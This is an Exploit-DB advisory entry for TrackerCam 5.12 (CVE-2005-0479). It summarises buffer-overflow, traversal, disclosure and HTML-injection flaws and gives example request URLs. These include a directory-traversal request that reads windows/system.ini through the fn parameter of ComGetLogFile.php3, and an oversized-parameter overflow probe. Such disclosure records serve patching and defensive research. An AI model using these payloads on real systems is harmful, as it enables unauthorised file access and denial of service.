TrackerCam 5.12 ComGetLogFile.php3 fm Parameter Traversal Arbitrary File Access

2005-02-18T00:00:00
ID EDB-ID:25123
Type exploitdb
Reporter Luigi Auriemma
Modified 2005-02-18T00:00:00

Description

TrackerCam 5.12 ComGetLogFile.php3 fm Parameter Traversal Arbitrary File Access. CVE-2005-0479. Webapps exploit for php platform

                                        
                                            source: http://www.securityfocus.com/bid/12592/info

TrackerCam is prone to multiple remote vulnerabilities, including buffer-overflow issues, a directory-traversal issue, an information-disclosure issue, an HTML-injection issue, and denial-of-service issues.

A remote attacker could exploit these issues to execute arbitrary code, obtain potentially sensitive information, launch phishing attacks or steal cookie based authentication credentials, and deny service to legitimate users. 

http://www.example.com:8090/MessageBoard/messages.php?aaaaaaaaaaa[256]aaaa
http://www.example.com:8090/tuner/ComGetLogFile.php3?fn=../../../../windows/system.ini
http://www.example.com:8090/tuner/ComGetLogFile.php3?fn=Eye2005_02.log